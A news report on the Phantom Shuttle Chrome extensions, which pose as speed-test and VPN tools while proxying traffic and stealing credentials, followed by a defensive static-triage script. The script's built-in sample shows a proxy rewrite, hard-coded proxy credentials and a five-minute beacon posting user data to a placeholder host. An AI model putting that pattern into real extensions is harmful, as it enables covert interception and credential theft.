Cybersecurity researchers have uncovered two malicious Google Chrome extensions, marketed under the name Phantom Shuttle, that pose as multi-location network speed test tools but are capable of intercepting traffic and stealing user credentials. Both extensions were developed by the same individual and were still available for download at the time of the report. Phantom Shuttle has been advertised to developers and foreign trade personnel, with users paying subscriptions ranging from ¥9.9 to ¥95.9 (CNY) in the belief that they are buying a legitimate VPN service. Socket Security researcher Kush Pandya explained that behind this facade the extensions function as man-in-the-middle proxies, exfiltrating data continuously to a command-and-control server.
The older extension, released in November 2017, has 2,000 users, while a 2023 variant has 180 users. Once a subscription is activated, VIP users are automatically placed into "smarty" proxy mode, which routes traffic for more than 170 targeted domains through the attacker's infrastructure. The extensions perform genuine latency tests to reinforce their legitimacy, while code hidden inside their bundled JavaScript libraries answers proxy authentication challenges with hard-coded credentials, so the browser authenticates to the attacker's proxy without the user ever seeing a prompt. Because that handler is registered for all HTTP authentication requests, the extensions keep control of the traffic for as long as they are installed.
Once the subscription is active, the extensions rewrite Chrome's proxy settings using modes that route either all traffic or only a list of high-value domains through the attacker's server. Targeted sites include developer platforms such as GitHub, Stack Overflow, and Docker; cloud services such as Amazon Web Services, Microsoft Azure, and DigitalOcean; enterprise vendors such as Cisco, IBM, and VMware; social media platforms; and adult websites, the last likely for blackmail purposes. The extensions also maintain a heartbeat to the C2 server at phantomshuttle[.]space, transmitting VIP users' emails, passwords, and version information every five minutes, which gives the operator ongoing credential exfiltration and session monitoring.
The operation captures passwords, credit card details, cookies, browsing history, API keys, and developer secrets, raising concerns that stolen developer tokens could be used to mount supply chain attacks. Indicators such as Chinese-language extension descriptions, Alipay and WeChat Pay integration, and hosting on Alibaba Cloud suggest a China-based threat actor. Researchers warn that the subscription model reinforces victim retention while presenting an illusion of legitimacy: a paying user has little reason to suspect the service they bought. Enterprises are advised to implement extension allowlisting, monitor proxy authentication activity, and remove Phantom Shuttle immediately; individual users should review their installed extensions, paying particular attention to any extension holding the proxy permission, and confirm that the browser's proxy configuration is one they expect, to stop ongoing exposure to data theft and network compromise.
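To make the detection advice concrete, here is an added example (written for this page; it is not Socket's tooling and contains no code from the extensions) of a static triage pass over an unpacked Chrome extension's manifest and background script. It looks for the three behaviours described above: a `chrome.proxy.settings.set` call that rewrites the proxy configuration, an `onAuthRequired` listener that answers with literal credentials, and a `setInterval` loop that beacons to a remote host. The sample manifest and script, the host `c2.example`, and the credentials in them are constructed placeholders, not material recovered from Phantom Shuttle.

```javascript
// Added example: regex-based static triage of an unpacked Chrome extension for
// proxy rewriting, auto-supplied proxy credentials and a periodic beacon.
// Heuristic only; obfuscated or string-built code will evade it.
"use strict";

// Constructed sample inputs modelled on the behaviour described in the article.
// c2.example and the credentials are placeholders, not real indicators.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Network Speed Test",
  permissions: ["proxy", "webRequest", "webRequestAuthProvider", "storage"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "bg.js" },
};
const SAMPLE_BACKGROUND = `
chrome.proxy.settings.set({ value: { mode: "pac_script", pacScript: { data: pac } }, scope: "regular" });
chrome.webRequest.onAuthRequired.addListener(
  (details) => ({ authCredentials: { username: "vip", password: "s3cret" } }),
  { urls: ["<all_urls>"] }, ["blocking"]);
setInterval(() => fetch("https://c2.example/heartbeat", { method: "POST", body: JSON.stringify(user) }), 5 * 60 * 1000);
`;
// Constructed benign control: a latency checker with no proxy permission.
const BENIGN_MANIFEST = { manifest_version: 3, name: "Ping Tool", permissions: ["storage"] };
const BENIGN_BACKGROUND = `
async function ping(url) { const t = performance.now(); await fetch(url, { mode: "no-cors" }); return performance.now() - t; }
`;

// Evaluate a setInterval delay written as a product of integer literals
// ("5 * 60 * 1000") without eval; null if the expression is any other shape.
function parseDelayMs(expr) {
  const s = expr.trim();
  if (!/^\d+(?:\s*\*\s*\d+)*$/.test(s)) return null;
  return s.split("*").reduce((acc, n) => acc * parseInt(n, 10), 1);
}

// Hosts named in fetch()/XMLHttpRequest.open() calls with absolute http(s) URLs.
function externalHosts(src) {
  const hosts = new Set();
  const re = /(?:fetch|open)\s*\([^)]*?["'`]https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(src)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

function triageExtension(manifest, sources) {
  const src = sources.join("\n");
  const findings = [];
  const perms = new Set([...(manifest.permissions || []), ...(manifest.optional_permissions || [])]);
  if (perms.has("proxy")) findings.push({ id: "proxy_permission", detail: "manifest requests chrome.proxy" });

  // Proxy rewrite: read the mode from the first few hundred chars of the call.
  let proxyMode = null;
  const proxyIdx = src.search(/chrome\.proxy\.settings\.set\s*\(/);
  if (proxyIdx >= 0) {
    const mode = src.slice(proxyIdx, proxyIdx + 400).match(/\bmode\s*:\s*["'](\w+)["']/);
    proxyMode = mode ? mode[1] : "unknown";
    findings.push({ id: "proxy_rewrite", detail: `proxy mode ${proxyMode}` });
  }

  // Auth handler: a literal password inside authCredentials is the tell.
  const authIdx = src.search(/onAuthRequired\.addListener\s*\(/);
  if (authIdx >= 0) {
    const creds = src.slice(authIdx).match(/authCredentials\s*:\s*\{[^}]*password\s*:\s*["'][^"']+["']/);
    findings.push(creds
      ? { id: "hardcoded_proxy_credentials", detail: "onAuthRequired answers with a literal password" }
      : { id: "auth_handler", detail: "onAuthRequired handler present" });
  }

  // Beacon: a setInterval whose callback performs a network call.
  let beaconIntervalMs = null;
  const beacon = src.match(/setInterval\s*\(([\s\S]*?),\s*([\d\s*]+)\)/);
  if (beacon && /fetch\s*\(|XMLHttpRequest|\.send\s*\(/.test(beacon[1])) {
    beaconIntervalMs = parseDelayMs(beacon[2]);
    findings.push({ id: "periodic_beacon", detail: `network call every ${beaconIntervalMs} ms` });
  }

  const ids = findings.map((f) => f.id);
  const verdict =
    ids.includes("proxy_rewrite") && ids.includes("hardcoded_proxy_credentials") ? "high"
      : ids.includes("proxy_rewrite") || ids.includes("periodic_beacon") ? "medium"
        : "low";
  return { verdict, findings, proxyMode, beaconIntervalMs, hosts: externalHosts(src) };
}

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, [SAMPLE_BACKGROUND]), null, 2));
console.log("benign control:", triageExtension(BENIGN_MANIFEST, [BENIGN_BACKGROUND]).verdict);
```

Run it with `node triage.js` against the JSON and script files pulled from the profile's extension directory. A `high` verdict means the extension both rewrites proxy settings and silently answers proxy challenges, which is exactly the combination the researchers describe; pair the result with the proxy-authentication monitoring recommended above, since a beacon interval and a contacted host give the SOC concrete things to search for in egress logs.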
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.